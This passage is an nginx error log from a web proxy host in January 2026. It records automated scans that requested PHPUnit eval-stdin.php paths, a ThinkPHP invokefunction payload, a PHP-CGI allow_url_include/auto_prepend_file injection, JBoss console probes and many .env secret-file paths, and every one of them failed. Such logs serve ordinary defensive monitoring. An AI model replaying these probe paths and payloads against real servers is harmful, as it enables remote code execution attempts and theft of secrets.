server: localhost-nginx-proxy-manager, request: "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 20:52:35 [error] 294#294: *44440 open() "/var/www/html/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 169.148.69.60, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 20:52:36 [error] 294#294: *44440 open() "/var/www/html/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 169.148.69.60, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 20:52:36 [error] 294#294: *44440 open() "/var/www/html/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 169.148.69.60, server: localhost-nginx-proxy-manager, request: "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 20:52:36 [error] 294#294: *44440 open() "/var/www/html/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 169.148.69.60, server: localhost-nginx-proxy-manager, request: "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 20:52:36 [error] 294#294: *44440 open() "/var/www/html/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 169.148.69.60, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 20:52:36 [error] 294#294: *44440 open() "/var/www/html/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 169.148.69.60, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 20:52:37 [error] 294#294: *44440 open() "/var/www/html/lib/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 169.148.69.60, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 20:52:37 [error] 294#294: *44440 open() "/var/www/html/lib/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 169.148.69.60, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 20:52:37 [error] 294#294: *44440 open() "/var/www/html/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 169.148.69.60, server: localhost-nginx-proxy-manager, request: "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 20:52:37 [error] 294#294: *44440 open() "/var/www/html/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 169.148.69.60, server: localhost-nginx-proxy-manager, request: "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 20:52:38 [error] 294#294: *44440 open() "/var/www/html/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 169.148.69.60, server: localhost-nginx-proxy-manager, request: "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 20:52:38 [error] 294#294: *44440 open() "/var/www/html/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 169.148.69.60, server: localhost-nginx-proxy-manager, request: "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 20:52:38 [error] 294#294: *44440 open() "/var/www/html/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 169.148.69.60, server: localhost-nginx-proxy-manager, request: "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 20:52:38 [error] 294#294: *44440 open() "/var/www/html/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 169.148.69.60, server: localhost-nginx-proxy-manager, request: "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 20:52:38 [error] 294#294: *44440 open() "/var/www/html/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 169.148.69.60, server: localhost-nginx-proxy-manager, request: "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 20:52:39 [error] 294#294: *44440 open() "/var/www/html/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 169.148.69.60, server: localhost-nginx-proxy-manager, request: "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 20:52:39 [error] 294#294: *44440 open() "/var/www/html/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 169.148.69.60, server: localhost-nginx-proxy-manager, request: "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 20:52:39 [error] 294#294: *44440 open() "/var/www/html/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 169.148.69.60, server: localhost-nginx-proxy-manager, request: "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 20:52:39 [error] 294#294: *44440 open() "/var/www/html/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 169.148.69.60, server: localhost-nginx-proxy-manager, request: "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 20:52:39 [error] 294#294: *44440 open() "/var/www/html/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 169.148.69.60, server: localhost-nginx-proxy-manager, request: "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 20:52:40 [error] 294#294: *44440 open() "/var/www/html/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 169.148.69.60, server: localhost-nginx-proxy-manager, request: "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 20:52:40 [error] 294#294: *44440 open() "/var/www/html/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 169.148.69.60, server: localhost-nginx-proxy-manager, request: "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 20:52:40 [error] 294#294: *44440 open() "/var/www/html/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 169.148.69.60, server: localhost-nginx-proxy-manager, request: "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 20:52:40 [error] 294#294: *44440 open() "/var/www/html/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 169.148.69.60, server: localhost-nginx-proxy-manager, request: "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 20:52:40 [error] 294#294: *44440 open() "/var/www/html/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 169.148.69.60, server: localhost-nginx-proxy-manager, request: "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 20:52:40 [error] 294#294: *44440 open() "/var/www/html/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 169.148.69.60, server: localhost-nginx-proxy-manager, request: "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 20:52:40 [error] 294#294: *44440 open() "/var/www/html/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 169.148.69.60, server: localhost-nginx-proxy-manager, request: "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 20:52:41 [error] 294#294: *44440 open() "/var/www/html/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 169.148.69.60, server: localhost-nginx-proxy-manager, request: "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 20:52:41 [error] 294#294: *44440 open() "/var/www/html/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 169.148.69.60, server: localhost-nginx-proxy-manager, request: "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 20:52:41 [error] 294#294: *44440 open() "/var/www/html/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 169.148.69.60, server: localhost-nginx-proxy-manager, request: "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 20:52:41 [error] 294#294: *44440 open() "/var/www/html/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 169.148.69.60, server: localhost-nginx-proxy-manager, request: "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 20:52:42 [error] 294#294: *44440 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 169.148.69.60, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 20:52:42 [error] 294#294: *44440 open() "/var/www/html/public/index.php" failed (2: No such file or directory), client: 169.148.69.60, server: localhost-nginx-proxy-manager, request: "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 20:52:43 [error] 294#294: *44440 open() "/var/www/html/containers/json" failed (2: No such file or directory), client: 169.148.69.60, server: localhost-nginx-proxy-manager, request: "GET /containers/json HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 21:20:35 [error] 294#294: *44457 open() "/var/www/html/index.asp" failed (2: No such file or directory), client: 204.76.203.20, server: localhost-nginx-proxy-manager, request: "GET /index.asp HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 21:27:41 [error] 294#294: *44459 open() "/var/www/html/invoker/EJBInvokerServlet" failed (2: No such file or directory), client: 72.167.44.205, server: localhost-nginx-proxy-manager, request: "HEAD /invoker/EJBInvokerServlet HTTP/1.1", host: "92.249.249.197" +2026/01/14 21:27:42 [error] 294#294: *44460 open() "/var/www/html/jmx-console/HtmlAdaptor" failed (2: No such file or directory), client: 72.167.44.205, server: localhost-nginx-proxy-manager, request: "HEAD /jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo HTTP/1.1", host: "92.249.249.197" +2026/01/14 21:27:44 [error] 294#294: *44461 open() "/var/www/html/invoker/JMXInvokerServlet" failed (2: No such file or directory), client: 72.167.44.205, server: localhost-nginx-proxy-manager, request: "HEAD /invoker/JMXInvokerServlet HTTP/1.1", host: "92.249.249.197" +2026/01/14 21:27:44 [error] 294#294: *44462 open() "/var/www/html/web-console/ServerInfo.jsp" failed (2: No such file or directory), client: 72.167.44.205, server: localhost-nginx-proxy-manager, request: "HEAD /web-console/ServerInfo.jsp HTTP/1.1", host: "92.249.249.197" +2026/01/14 22:32:38 [error] 291#291: *44482 open() "/var/www/html/vgbh" failed (2: No such file or directory), client: 195.3.222.78, server: localhost-nginx-proxy-manager, request: "GET /vgbh HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 22:35:36 [error] 291#291: *44483 open() "/var/www/html/portal/redlion" failed (2: No such file or directory), client: 20.163.15.97, server: localhost-nginx-proxy-manager, request: "GET /portal/redlion HTTP/1.1", host: "92.249.249.197" +2026/01/14 22:44:29 [error] 298#298: *44488 open() "/var/www/html/index.asp" failed (2: No such file or directory), client: 204.76.203.20, server: localhost-nginx-proxy-manager, request: "GET /index.asp HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 23:33:10 [error] 300#300: *46002 open() "/var/www/html/index.htm" failed (2: No such file or directory), client: 45.194.92.18, server: localhost-nginx-proxy-manager, request: "GET /index.htm HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 23:35:18 [error] 301#301: *46012 open() "/var/www/html/login" failed (2: No such file or directory), client: 193.142.146.230, server: localhost-nginx-proxy-manager, request: "GET /login HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 23:56:23 [error] 301#301: *46022 open() "/var/www/html/vgbh" failed (2: No such file or directory), client: 195.3.222.78, server: localhost-nginx-proxy-manager, request: "GET /vgbh HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 00:03:09 [error] 301#301: *46029 "/var/www/html/bins/index.html" is not found (2: No such file or directory), client: 204.76.203.18, server: localhost-nginx-proxy-manager, request: "GET /bins/ HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 00:07:30 [error] 298#298: *46032 open() "/var/www/html/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 00:07:30 [error] 298#298: *46033 open() "/var/www/html/admin/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /admin/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 00:07:30 [error] 298#298: *46034 open() "/var/www/html/api/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /api/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 00:07:31 [error] 298#298: *46035 open() "/var/www/html/app/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /app/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 00:07:31 [error] 298#298: *46036 open() "/var/www/html/backend/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /backend/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 00:07:31 [error] 298#298: *46037 open() "/var/www/html/demo/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /demo/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 00:07:32 [error] 298#298: *46038 open() "/var/www/html/dev/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /dev/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 00:07:32 [error] 298#298: *46039 open() "/var/www/html/staging/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /staging/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 00:07:32 [error] 298#298: *46040 open() "/var/www/html/mail/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /mail/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 00:07:32 [error] 298#298: *46041 open() "/var/www/html/m/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /m/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 00:07:32 [error] 298#298: *46042 open() "/var/www/html/remote/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /remote/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 00:07:32 [error] 298#298: *46043 open() "/var/www/html/webmail/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /webmail/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 00:07:33 [error] 298#298: *46044 open() "/var/www/html/server/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /server/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 00:07:33 [error] 298#298: *46045 open() "/var/www/html/vpn/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /vpn/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 00:07:33 [error] 298#298: *46046 open() "/var/www/html/secure/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /secure/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 00:07:33 [error] 299#299: *46047 open() "/var/www/html/shop/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /shop/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 00:07:33 [error] 299#299: *46048 open() "/var/www/html/cloud/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /cloud/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 00:07:33 [error] 299#299: *46049 open() "/var/www/html/portal/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /portal/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 00:07:33 [error] 299#299: *46050 open() "/var/www/html/host/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /host/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 00:07:35 [error] 299#299: *46051 open() "/var/www/html/support/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /support/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 00:07:36 [error] 299#299: *46052 open() "/var/www/html/pop/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /pop/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 00:07:36 [error] 299#299: *46053 open() "/var/www/html/store/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /store/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 00:07:36 [error] 299#299: *46054 open() "/var/www/html/cdn/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /cdn/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 00:07:36 [error] 299#299: *46055 open() "/var/www/html/dashboard/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /dashboard/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 00:07:37 [error] 299#299: *46056 open() "/var/www/html/test/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /test/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 00:07:37 [error] 299#299: *46057 open() "/var/www/html/smtp/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /smtp/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 00:07:37 [error] 299#299: *46058 open() "/var/www/html/ftp/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /ftp/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 00:07:37 [error] 299#299: *46059 open() "/var/www/html/wiki/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /wiki/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 00:07:37 [error] 299#299: *46060 open() "/var/www/html/help/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /help/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 00:07:37 [error] 299#299: *46061 open() "/var/www/html/blog/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /blog/.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 02:44:01 [error] 301#301: *46101 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 93.123.72.132, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 02:46:01 [error] 301#301: *46103 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.187.35.158, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 02:57:17 [error] 301#301: *46106 open() "/var/www/html/goform/formJsonAjaxReq" failed (2: No such file or directory), client: 91.224.92.14, server: localhost-nginx-proxy-manager, request: "POST /goform/formJsonAjaxReq HTTP/1.1", host: "92.249.249.197:80", referrer: "http://92.249.249.197:80/home.asp" +2026/01/15 03:09:32 [error] 301#301: *46111 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.61.209.92, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 04:04:03 [error] 298#298: *46146 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 04:35:53 [error] 298#298: *46190 "/var/www/html/bin/index.html" is not found (2: No such file or directory), client: 204.76.203.18, server: localhost-nginx-proxy-manager, request: "GET /bin/ HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 05:07:27 [error] 307#307: *46199 "/var/www/html/backup/index.html" is not found (2: No such file or directory), client: 204.76.203.18, server: localhost-nginx-proxy-manager, request: "GET /backup/ HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 05:16:08 [error] 305#305: *46205 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 38.248.14.48, server: localhost-nginx-proxy-manager, request: "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 05:16:09 [error] 305#305: *46205 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 38.248.14.48, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 05:16:09 [error] 305#305: *46205 open() "/var/www/html/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 38.248.14.48, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 05:16:09 [error] 305#305: *46205 open() "/var/www/html/vendor/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 38.248.14.48, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 05:16:09 [error] 305#305: *46205 open() "/var/www/html/vendor/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 38.248.14.48, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 05:16:10 [error] 305#305: *46205 open() "/var/www/html/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" failed (2: No such file or directory), client: 38.248.14.48, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 05:16:10 [error] 305#305: *46205 open() "/var/www/html/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 38.248.14.48, server: localhost-nginx-proxy-manager, request: "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 05:16:10 [error] 305#305: *46205 open() "/var/www/html/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 38.248.14.48, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 05:16:10 [error] 305#305: *46205 open() "/var/www/html/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 38.248.14.48, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 05:16:11 [error] 305#305: *46205 open() "/var/www/html/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 38.248.14.48, server: localhost-nginx-proxy-manager, request: "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 05:16:11 [error] 305#305: *46205 open() "/var/www/html/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 38.248.14.48, server: localhost-nginx-proxy-manager, request: "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 05:16:11 [error] 305#305: *46205 open() "/var/www/html/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 38.248.14.48, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 05:16:11 [error] 305#305: *46205 open() "/var/www/html/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 38.248.14.48, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 05:16:11 [error] 305#305: *46205 open() "/var/www/html/lib/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 38.248.14.48, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 05:16:12 [error] 305#305: *46205 open() "/var/www/html/lib/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 38.248.14.48, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 05:16:12 [error] 305#305: *46205 open() "/var/www/html/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 38.248.14.48, server: localhost-nginx-proxy-manager, request: "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 05:16:12 [error] 305#305: *46205 open() "/var/www/html/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 38.248.14.48, server: localhost-nginx-proxy-manager, request: "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 05:16:12 [error] 305#305: *46205 open() "/var/www/html/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 38.248.14.48, server: localhost-nginx-proxy-manager, request: "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 05:16:12 [error] 305#305: *46205 open() "/var/www/html/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 38.248.14.48, server: localhost-nginx-proxy-manager, request: "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 05:16:13 [error] 305#305: *46205 open() "/var/www/html/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 38.248.14.48, server: localhost-nginx-proxy-manager, request: "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 05:16:13 [error] 305#305: *46205 open() "/var/www/html/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 38.248.14.48, server: localhost-nginx-proxy-manager, request: "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 05:16:13 [error] 305#305: *46205 open() "/var/www/html/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 38.248.14.48, server: localhost-nginx-proxy-manager, request: "GET 